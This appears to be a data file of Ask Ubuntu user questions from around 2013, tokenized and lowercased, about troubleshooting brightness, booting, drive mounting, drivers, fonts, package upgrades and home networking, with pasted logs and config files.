373454	13.04 upgrade â brightness not working	up until yesterday i was running ubuntu 12.10 on my dell latitude e6530 . recently i played around with the nvidia settings , which caused my brightness control to stop working . however , i could fix it by adding option `` registrydwords '' `` enablebrightnesscontrol=1 '' to /etc/x11/xorg.conf as advised in [ 1 ] . now , last night i upgraded to ubuntu 13.04 because i needed are newer kernel . after that , the brightness control once again stopped working . but this time , [ 1 ] does n't help . i have also tried the methods in [ 2 ] : acpi_backlight=vendor in /etc/default/grub acpi_osi=linux in /etc/default/grub echo $ some_value | sudo tee /sys/class/backlight/dell_backlight/brightness none of them are working , the brightness just does n't change , but that 's about all i could find for this problem . any ideas on how i can get my brightness control back ? [ 1 ] http : //askubuntu.com/a/270830 [ 2 ] http : //askubuntu.com/a/289178/213036
373455	darktable not starting . no error	when i try to start darktable , simply nothing happens . no error appears , nothing . what can i do to get an errorlog or something else to get further help ? this happens after upgrading from 13.04 to 13.10 i tried to use ppa : pmjdebruijn/darktable-release but do n't get any updates . edit : after getting the first answer , i ran darktable from terminal . it saves a file with the following content : this is darktable 1.2.3 reporting a segfault : /usr/share/darktable/gdb_commands:2 : error in sourced command file : no stack any ideas what i can do ? ~
373459	problems in detecting pen drive	first of all , i do n't have an issue with detecting my pen drive on 32-bit ubuntu 12.04 . it can detect my pen drive very fast when plug in . then , i bought a laptop installed with windows 7 64-bit operating system . i have decided to installed ubuntu alongside with win7 . to be precise , i installed ubuntu 12.04.3 64-bit . it appears that every time i plug in my pen drive , it is either very slow automatically mount . it is even worst that the pen drive wo n't mount when plug in to usb 3.0 port . anyone ? update : my laptop can detect pen drive now either 3.0 or 2.0 port . the question is why the pen drive very slow shows up ?
373461	how to get smooth scrolling with magic mouse ?	smooth scrolling with the laptop 's touchpad works in almost every app ( nautilus , software center , gedit.. ) but not with apple 's magic mouse . this mouse has touch surface and is just like a touchpad , but it acts like a scroll wheel when scrollign . also , notice that in firefox , with smooth scrolling enabled , magic mouse works exactly like the laptop 's touchpad . its the same , i dont notice any difference . is it possible to make it work also in all the other apps like in firefox ?
373468	no boot menu when ubuntu is installed alongside windows	i installed ubuntu 12.10 using a usb stick following the instructions mentioned on the ubuntu site . when i start my system , no menu appears to choose whether to boot windows or ubuntu . while installing ubuntu , there were no errors and installation completed successfully .
373469	how to disable kvm for installing vmware player	when i was going to install vmware player a massage has shown you can not install a system with kvm enable . my processor is amd phenom ii x6 1100t . so how can i disable kvm on my system . i am actually a new in linux world . sorry for my bad english and thanks in advance .
373471	mount a hard drive to recover data	my mybookworld enclosure died , i have removed the hard drive from the housing and managed to mount it in my pc . i looked at it with partition assistant and it says it is ext3 . i have created a usb with ubuntu 13.10 on it and booted the pc , when i look at in the disks it states it is linux raid fat 12 . i have tried to mount it as stated in some other forums , but am having no luck , i was hoping some one may be able to help me . if i run fdisk -l this is the result : root @ ubuntu : /home/ubuntu # fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf8000000 device boot start end blocks id system /dev/sda1 63 224909 112423+ de dell utility /dev/sda2 * 225280 18489343 9132032 7 hpfs/ntfs/exfat /dev/sda3 18489344 1465145343 723328000 7 hpfs/ntfs/exfat warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00007c00 device boot start end blocks id system /dev/sdb1 48195 5927984 2939895 1 fat12 /dev/sdb2 5927985 6136829 104422+ 1 fat12 /dev/sdb3 6136830 8112824 987997+ 1 fat12 /dev/sdb4 8112825 1953520064 972703620 1 fat12 disk /dev/sdc : 16.0 gb , 16043212800 bytes 64 heads , 32 sectors/track , 15300 cylinders , total 31334400 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20ac7dda this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdc1 ? 3224498923 3657370039 216435558+ 7 hpfs/ntfs/exfat /dev/sdc2 ? 3272020941 930513678 976730017 16 hidden fat16 /dev/sdc3 ? 0 0 0 6f unknown /dev/sdc4 50200576 974536369 462167897 0 empty partition table entries are not in disk order i have made a directory /media/abc ( this is created ) when i try and mount it using : mount -t ext3 /dev/sdb4 /media/abc i get this : mount : wrong fs type , bad option , bad superblock on /dev/sdb4 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg | tail results in this : [ 4048.126156 ] 00 7d 90 10 [ 4048.126169 ] sd 3:0:0:0 : [ sdb ] [ 4048.126175 ] add . sense : unrecovered read error - auto reallocate failed [ 4048.126180 ] sd 3:0:0:0 : [ sdb ] cdb : [ 4048.126183 ] read ( 10 ) : 28 00 00 7d 90 09 00 00 08 00 [ 4048.126197 ] end_request : i/o error , dev sdb , sector 8228880 [ 4048.126239 ] ata4 : eh complete [ 4048.126246 ] jbd : failed to read block at offset 12947 [ 4048.126622 ] jbd : recovery failed [ 4048.126628 ] ext3-fs ( sdb4 ) : error loading journal i have tried it replacing ext3 with xfs as suggested . any help appreciated , complete newbie to ubuntu . thanks caz
373473	problem after upgrading ubuntu 12.04 to 12.10	i upgraded my ubuntu to 12.10 from 12.04 after which i restarted my computer when asked . and now all i can see is grub rescue > on a black background . i am a beginner in ubuntu . please tell me what to do ?
373479	how to import .m3u playlist	i exported my my itunes playlists to .m3u files before i got rid of windows 7 completely . now i would like to import the playlists into rhythmbox , but ca n't . my playlists contain windows file names ( e.g . d : \music ... . ) instead of linux file names ( e.g . /mnt/music ... . ) . the music is still stored on the exact same disk and folder as it was under windows . i need a script to convert the file names , can anyone help ?
373483	installing canon mp287 printer in ubuntu 12.04 lts 64 bit	i have a canon mp287 printer . i follow the instructions from the blog.sudobits.com for installing this printer in my ubuntu 12.04 lts 64 bit operating system . but after doing so i got the following error in my terminal : ================================================== canon inkjet printer driver ver.3.40-1 for linux copyright canon inc. 2001-2010 all rights reserved . ================================================== an error occurred . the package management system can not be identified . any one have any idea about installing the driver ?
373484	how to install jupiter in ubuntu 13.10 saucy salamander ?	i used to use `` jupiter '' on previous ubuntu versions , but now i ca n't find a way to install it in the newer version of ubuntu . is there a way to download it ?
373486	how to merge free space with filesystem partition ?	that 's the snapshot of my disk . i want to merge free space to primary partition without data loss .
373492	ubuntu mini remix and network	i want to build distro from ubuntu mini remix , however when i install network manager to mini remix , desktop wont load anymore , and error comes out `` failed to load gnome session '' even when there is lxde environment is installed . how can i install network manager so it afterwards doesnt try to load gnome which is not installed ?
373493	i do n't know what version is running	how do i find the version of ubuntu that is currently running on my system ? i just got this new computer with ubuntu pre-installed and i do n't know anything about it .
373494	urxvt font smoothing not as good as konsole	i have been playing with urxvt lately and find the font-rendering not very satisfying : the result from konsole : you can see konsole renders it much sharper and clearer . here is my .xdefaults : ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ! xft settings ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ! xft.dpi : 96 xft.antialias : true xft.rgba : rgb xft.hinting : true ! xft.hintstyle : hintslight xft.autohint : true xft.hintstyle : hintfull ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ! urxvt settings ! colours lifted from solarized ( http : //ethanschoonover.com/solarized ) ! more info at : ! http : //pod.tst.eu/http : //cvs.schmorp.de/rxvt-unicode/doc/rxvt.1.pod ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - urxvt.depth : 256 urxvt.geometry : 90x30 urxvt.transparent : false urxvt.fading : 0 ! urxvt.urgentonbell : true ! urxvt.visualbell : true urxvt.loginshell : true urxvt.savelines : 50000 urxvt.internalborder : 0 urxvt.linespace : 0 ! fonts urxvt.allow_bold : true /* urxvt.font : -*-terminus-medium-r-normal-*-12-120-72-72-c-60-iso8859-1 */ urxvt*font : xft : dejavu sans mono : pixelsize=16 urxvt*boldfont : xft : dejavu sans mono : pixelsize=16 ! fix font space urxvt*letterspace : -1 ! scrollbar urxvt.scrollstyle : rxvt urxvt.scrollbar : false ! perl extensions urxvt.perl-ext-common : default , matcher urxvt.matcher.button : 1 urxvt.urllauncher : firefox ! cursor urxvt.cursorblink : true urxvt.cursorcolor : # 657b83 urxvt.cursorunderline : false ! pointer urxvt.pointerblank : true ! ! source http : //github.com/altercation/solarized ! *background : # 002b36 ! *foreground : # 657b83 ! ! ! *fading : 40 ! *fadecolor : # 002b36 ! *cursorcolor : # 93a1a1 ! *pointercolorbackground : # 586e75 ! *pointercolorforeground : # 93a1a1 ! ! ! ! black dark/light ! *color0 : # 073642 ! *color8 : # 002b36 ! ! ! ! red dark/light ! *color1 : # dc322f ! *color9 : # cb4b16 ! ! ! ! green dark/light ! *color2 : # 859900 ! *color10 : # 586e75 ! ! ! ! yellow dark/light ! *color3 : # b58900 ! *color11 : # 657b83 ! ! ! ! blue dark/light ! *color4 : # 268bd2 ! *color12 : # 839496 ! ! ! ! magenta dark/light ! *color5 : # d33682 ! *color13 : # 6c71c4 ! ! ! ! cyan dark/light ! *color6 : # 2aa198 ! *color14 : # 93a1a1 ! ! ! ! white dark/light ! *color7 : # eee8d5 ! *color15 : # fdf6e3 urxvt*transparent : true ! urxvt*shading : 40 urxvt*savelines : 12000 urxvt*scrollbar : false ! ! xterm*facename : bitstream vera sans mono xterm*facename : dejavu sans mono for powerline xterm*facesize : 9 ! ! drop in solarized colorscheme for xresources/xdefaults ! ! solarized hex 16/8 termcol xterm/hex l*a*b rgb hsb ! ! -- -- -- -- - -- -- -- - -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- - ! ! base03 # 002b36 8/4 brblack 234 # 1c1c1c 15 -12 -12 0 43 54 193 100 21 ! ! base02 # 073642 0/4 black 235 # 262626 20 -12 -12 7 54 66 192 90 26 ! ! base01 # 586e75 10/7 brgreen 240 # 585858 45 -07 -07 88 110 117 194 25 46 ! ! base00 # 657b83 11/7 bryellow 241 # 626262 50 -07 -07 101 123 131 195 23 51 ! ! base0 # 839496 12/6 brblue 244 # 808080 60 -06 -03 131 148 150 186 13 59 ! ! base1 # 93a1a1 14/4 brcyan 245 # 8a8a8a 65 -05 -02 147 161 161 180 9 63 ! ! base2 # eee8d5 7/7 white 254 # e4e4e4 92 -00 10 238 232 213 44 11 93 ! ! base3 # fdf6e3 15/7 brwhite 230 # ffffd7 97 00 10 253 246 227 44 10 99 ! ! yellow # b58900 3/3 yellow 136 # af8700 60 10 65 181 137 0 45 100 71 ! ! orange # cb4b16 9/3 brred 166 # d75f00 50 50 55 203 75 22 18 89 80 ! ! red # dc322f 1/1 red 160 # d70000 50 65 45 220 50 47 1 79 86 ! ! magenta # d33682 5/5 magenta 125 # af005f 50 65 -05 211 54 130 331 74 83 ! ! violet # 6c71c4 13/5 brmagenta 61 # 5f5faf 50 15 -45 108 113 196 237 45 77 ! ! blue # 268bd2 4/4 blue 33 # 0087ff 55 -10 -45 38 139 210 205 82 82 ! ! cyan # 2aa198 6/6 cyan 37 # 00afaf 60 -35 -05 42 161 152 175 74 63 ! ! green # 859900 2/2 green 64 # 5f8700 60 -20 65 133 153 0 68 100 60 # define s_base03 # 002b36 # define s_base02 # 073642 # define s_base01 # 586e75 # define s_base00 # 657b83 # define s_base0 # 839496 # define s_base1 # 93a1a1 # define s_base2 # eee8d5 # define s_base3 # fdf6e3 # define s_green # b58900 # define s_yellow # cb4b16 # define s_orange # d30102 # define s_red # dc322f # define s_magenta # 6c71c4 # define s_violet # 268bd2 # define s_blue # 2aa198 # define s_cyan # 859900 *background : s_base03 *foreground : s_base00 *fading : 40 *fadecolor : s_base03 *cursorcolor : s_base1 *pointercolorbackground : s_base01 *pointercolorforeground : s_base1 ! ! black dark/light *color0 : s_base02 *color8 : s_base03 ! ! red dark/light *color1 : s_red *color9 : s_orange ! ! green dark/light *color2 : s_green *color10 : s_base01 ! ! yellow dark/light *color3 : s_yellow *color11 : s_base00 ! ! blue dark/light *color4 : s_blue *color12 : s_base0 ! ! magenta dark/light [ *color5 : s_magenta *color13 : s_violet ! ! cyan dark/light *color6 : s_cyan *color14 : s_base1 ! ! white dark/light *color7 : s_base2 *color15 : s_base3 i like urxvt because it 's really fast and lightweight , is there any way to improve its font-rendering ?
373498	after the update to 13.10 in the finder i only see social media results	i updated to ubunto 13.10 . if i now click the ubunto logo the default is that he only searches in social media ... ; - ( i can not find my programms any more ! can somebody help me rob
373499	some files just wont install- linux-image-3.5.0-42-generic	it gives the following details of the package operation failing after using the sofware updater on 12.10 : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... ( reading database ... ( reading database ... 217566 files and directories currently installed . ) preparing to replace linux-image-3.5.0-36-generic 3.5.0-36.57~precise1 ( using ... /linux-image-3.5.0-36-generic_3.5.0-36.57_amd64.deb ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory done . unpacking replacement linux-image-3.5.0-36-generic ... dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-36-generic_3.5.0-36.57_amd64.deb ( -- unpack ) : unable to make backup link of `./boot/system.map-3.5.0-36-generic ' before installing new version : operation not permitted no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-36-generic /boot/vmlinuz-3.5.0-36-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-36-generic /boot/vmlinuz-3.5.0-36-generic preparing to replace linux-image-3.5.0-42-generic 3.5.0-42.65~precise1 ( using ... /linux-image-3.5.0-42-generic_3.5.0-42.65_amd64.deb ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory done . unpacking replacement linux-image-3.5.0-42-generic ... dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65_amd64.deb ( -- unpack ) : unable to make backup link of `./boot/system.map-3.5.0-42-generic ' before installing new version : operation not permitted no apport report written because maxreports is reached already examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic preparing to replace memtest86+ 4.20-1.1ubuntu1 ( using ... /memtest86+_4.20-1.1ubuntu2.1_amd64.deb ) ... unpacking replacement memtest86+ ... dpkg : error processing /var/cache/apt/archives/memtest86+_4.20-1.1ubuntu2.1_amd64.deb ( -- unpack ) : unable to make backup link of `./boot/memtest86+.bin ' before installing new version : operation not permitted no apport report written because maxreports is reached already locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-36-generic_3.5.0-36.57_amd64.deb /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65_amd64.deb /var/cache/apt/archives/memtest86+_4.20-1.1ubuntu2.1_amd64.deb error in function : output of df -h : filesystem size used avail use % mounted on /dev/sda6 38g 6.5g 30g 19 % / udev 3.5g 4.0k 3.5g 1 % /dev tmpfs 1.5g 924k 1.5g 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 3.6g 296k 3.6g 1 % /run/shm none 100m 64k 100m 1 % /run/user /dev/sda1 197m 87m 111m 44 % /boot /dev/sda5 243g 971m 230g 1 % /home
373503	php2po usage on ubuntu	how can i use php2po command on ubuntu ? i have tried : php2po lang.php polang.po , but it has created a blank file . what is the problem with this code ?
373508	usb dongle ( mts mblaze ) does n't mount	i bought an mts mblaze ultra usb dongle . there is a manual that came with it . it asks me to plug it in , and find a media/cdrom0 directory and run a script in it . but i ca n't find cdrom0 or anything like that under /media/ . what should i do ? output of dmesg | tail : [ 50.708749 ] usbcore : registered new interface driver option [ 50.708750 ] option : v0.7.2 : usb driver for gsm modems [ 51.700859 ] scsi 7:0:0:0 : direct-access zte usb storage fffe 2.31 pq : 0 ansi : 2 [ 51.701714 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 51.703415 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 80.999316 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 160d0000 , was 16000000 [ 108.993405 ] ppp bsd compression module registered [ 109.051205 ] ppp deflate compression module registered [ 328.405235 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 160d0000 [ 340.306966 ] cfg80211 : found new beacon on frequency : 2467 mhz ( ch 12 ) on phy0 edit : output of same command on another identical device : [ 20200.396232 ] option 2-1.2:1.1 : gsm modem ( 1-port ) converter detected [ 20200.396448 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 20200.396681 ] option 2-1.2:1.2 : gsm modem ( 1-port ) converter detected [ 20200.396891 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 20200.397090 ] option 2-1.2:1.3 : gsm modem ( 1-port ) converter detected [ 20200.397270 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb3 [ 20200.397674 ] scsi15 : usb-storage 2-1.2:1.4 [ 20201.393856 ] scsi 15:0:0:0 : direct-access zte usb storage fffe 2.31 pq : 0 ansi : 2 [ 20201.394677 ] sd 15:0:0:0 : attached scsi generic sg2 type 0 [ 20201.396164 ] sd 15:0:0:0 : [ sdb ] attached scsi removable disk
373513	how to remove root login from login screen	i have enabled root to login from screen . i want disable it keep normal and guest user on login screen only because even if i login with normal user for shutting down my machine i have to login with root which was not a problem before enabling root login from screen
373516	getting a black screen after booting into ubuntu 12.04 lts release following installation via windows installer . i have windows 7 installed already	not able to boot into ubuntu 12.04 . i select the ubuntu option from the dual boot window . after that all i see is a black screen . no windows , no icons . i am using dell xps 15z model with second generation i7 processor and 1 tb hard disk . i installed ubuntu in a separate partition using windows installer .
373519	front panel audio jack is not working after recent update	front panel audio jack is not working after recent update . i had problem with grub2 and repaired it . after repair my pc had no sound from front and back audio panels and also had display problem . i reported the problem and a few days later i got an update which solved display and sound problem except this one . i tried a various measures from online help to work the panel back to normal but in vein . this is my pc : memory : 2.9gb processor : pentium ( r ) dual-core cpu e5200 @ 2.50ghz ă 2 graphics : intelâž g33 x86/mmx/sse2 os type : 32-bit thank you in advance
373520	after the upgrade 13.04 to 13.10 i have problems with characters rendering in a weird way	since the upgrade from 13.04 to 13.10 some characters in a text render in a weird way . as if pixels in the characters are missing . it seems to be random . sometimes it 's in the terminal , another time it 's when using firefox or reading mail in thunderbird . when i select the text the broken characters render correctly . or just hovering my mouse above it . a screenshot of the problem showing up in libreoffice is below . a reboot does n't fix the issue . does anybody else experience this as well ? ( note : screenshot taken with intel mobile gm965/gl960 video card . )
373521	hiding partition in nautilius	i 'm using ubuntu 13.10 and nautilus ( file ) v 3.8.2 on dell inspiron 7535 which had comes with windows 8 pre installed . dell had already created lots of partitions . i want to make this partitions not to show in the nautilus ? what will be best way to hide this ? note : as of now i want to mess up / delete that partitions as i have already a had a battle installing ubuntu on this machine .
373522	wifi not turning on says firmware missing ubuntu 12.10	lspci output : : 00:00.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9995 00:01.1 audio device : advanced micro devices [ amd ] nee ati device 9902 00:04.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:05.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:07.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port 00:10.0 usb controller : advanced micro devices [ amd ] device 7814 ( rev 09 ) 00:10.1 usb controller : advanced micro devices [ amd ] device 7814 ( rev 09 ) 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 16 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 5 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0c ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 03:00.0 network controller : ralink corp. device 3290 03:00.1 bluetooth : ralink corp. device 3298
373524	retreive data from folder on home partition	since installing updates to unbuntu upgrade 13.10 i can not log in as main user . tried just about all the advice offered on this forum but nothing works . i need to do a clean install but i dont know how to access or save/copy transfer data , from my home folder/partition to an external hdd . in other words i dont know how to access my home partition to release the data . please help . i understood that when i created this `` home '' partition during installation that its primary purpose was to store data to enable easier upgrading/clean install . hope this is true and i can find some way to access the data . it should in effect be stored on ubuntu one but a quick look appears to show much of it is missing . the folders are there but they are empty . please help thanks
373525	unable to see network connection	i purchase my laptop recently , i ma trying to connect my lan , but after setting my ip address and gateway not able to see network connecting.please help me .
373527	gajim : ca n't access submenus in top menu bar	i just installed gajim 0.15.4 from ubuntu repository on ubuntu 13.10 . advanced , as far as i know , is supposed to be a sub-menu . clicking on it does nothing . what can i try to fix this problem ?
373529	ubuntu resolution problem	i tried to automatically change the resolution using this answered question : how to add display resolution fo an lcd in ubuntu 12.04 ? xrandr problem but it did n't work . it 's stuck on the splash screen . this is my 10-monitor.conf file : section `` monitor '' identifier `` monitor0 '' `` 1600x900_60.00 '' 119.00 1600 1696 1864 2128 900 901 904 932 -hsync +vsync endsection section `` screen '' identifier `` screen0 '' device `` virtual1 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1600x900_60.00 '' `` 1600x900 '' endsubsection endsection i 'm getting a parsing er error on line 3 `` 1600x900_60.00 is not valid in this section '' . when renaming the file it started , but of course it did n't work .
373531	no disk drive detected	no disk drive detected in gigabyte uefi dual bios . i tried : sata sata boot option - ahci and ide csm support - always boot mode selection - uefi and legacy , uefi , legacy please help me . what else need to do installing ubuntu 12.0 ?
373532	when executing acroreader it fails with `` error while loading shared libraries : libxml2.so.2 : can not open shared object file ''	i have downloaded adobe reader 9.5.5 and installed it using gdebi.now if i click on any pdf it is not starting.i tried `` acroread '' in terminal and it is showing me this error /opt/adobe/reader9/reader/intellinux/bin/acroread : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory then i have installed libxml2.but still it is showing the same above error . my system os is ubuntu 13.10 . is there any solution to my problem for using adobe reader or any other alternative pdf reader other than foxit and default ( evince ) or okular by using which i can highlight any text in my pdf ?
373533	ubuntu 12.04.3 always ask for disk checking on startup ?	everyone i downloaded ubuntu 12.04.3 desktop version from ubuntu site around 3-4 times and it did not work . actually the problem is that it inculde wubi 12.04.1 in setup of 12.04.3 and thats why i get some error and the programs installation failed on windows7 . after that i installed ubuntu 10.04 and then upgrade it to 12.4.3 , i dont use wubi i installed it with windows 7 dual boot . i did it for the first time , and thats why dont know how to create swap partition and ext2 partition simulataneusly , as when i create one second gets lost , so i create only ext2 on which ubuntu is installed , there is no swap partition , is it okay . my ubuntu drive size is 150gb and on each startup it is asking for disk checking , please tell me how to get rid of this disk checking problem .
373536	ubuntu 12.04 login screen flickering	i have ubuntu 12.04 lts installed on dell c2duo machine . its login screen is flickering randomly . can any one help me what 's the mess this is ? thanks
373537	image viewer in ubuntu that can show the pixel coordinates and pixel value as well for current mouse location in the image	i am looking for any image viewer in ubuntu which can show the pixel coordinates and pixel value under current location of mouse other than gimp ... .. thanks for your help
373538	how can i pause/resume download in youtube video ?	i have downloaded youtube videos using youtube-dl . but due to network problem or other problem sometimes i am not able to download video completely . later , i need to download that video from beginning . is there any way to pause and resume download ? i use both chromium and mozilla .
373539	how to set a filesystem type without losing data ?	i have my 2tb external hdd that was working perfectly . now it wo n't auto mount or manually mount . i keep receiving errors telling me that i have the wrong filesystem type . is there a way to set a filesystem type without losing all my data ?
373541	launcher icons collapse	my launcher 's icons collapse when i run out of space . how do i turn this off ? it looks like this : capture : collapsed and i want it to look like this all the time , not just when i mouse over it . i would like to have to scroll or drag to see it all : capture : expanded i ca n't post pictures i 'm afraid , so i 've provided links . tim
373543	is it possible to install evernote on ubuntu using fogger ?	i found that , there is not official client of evernote for ubuntu . many people use everpad on ubuntu to synchronize evennote with ubuntu desktop , but i 'm interested to make the evernote web into an web apps for ubuntu using fogger ? is it possible ?
373545	unreachable subnet in one direction	i 'm unable to route traffic to a subnet in my home . here 's my topology : inet < - > router a < - > router b < - > wifi ap where : router a - arris tg862g/ct ( from comcast ) - wan dhcp , lan 10.0.0.99 router b - linksys wrt400n with dd-wrt - wan 10.0.0.12 , lan 10.0.1.1 i was able to use dd-wrt to configure a static route for the 10.0.1.x network back to the 10.0.0.x network . but i 'm not sure if i can do the reverse on the arris router and was looking for suggestions on how to fix that . i 've set things up this wasy because i am using opendns to mange internet content for my kids and of course i was n't able to configure dns to my liking on router a either . so at present i 'm using router a on 10.0.0.x to provide a private unfiltered wifi ap ( no ssid broadcast ) that i use for netflix only and then i use router b to provide a filtered wifi ap for the rest of my wifi devices on 10.0.1.x . however i would like to be able to connect to my 10.0.1.x devices from the internet via dynamic dns ; but i ca n't see anything behind router b this way . thoughts ?
373547	why did files ( nautilus ) stop updating partition 's bookmarks ?	i 've upgraded from 13.04 to 13.10 and noticed that files ( nautilus ) stopped updating my bookmarks that are located in another partition ( an ext4 one ) . it used to work before . testing , i 've found out that , if i add any new bookmark ( using ctrl + d , for example ) , files then adds this new one and updates all bookmarks , showing that ones that point to my partition . i conclude that the feature ( updating bookmarks ) works , but it 's not being executed when i mount my partition clicking on it . any hints on how to solve this ? bookmarks really speed up everyday activities .
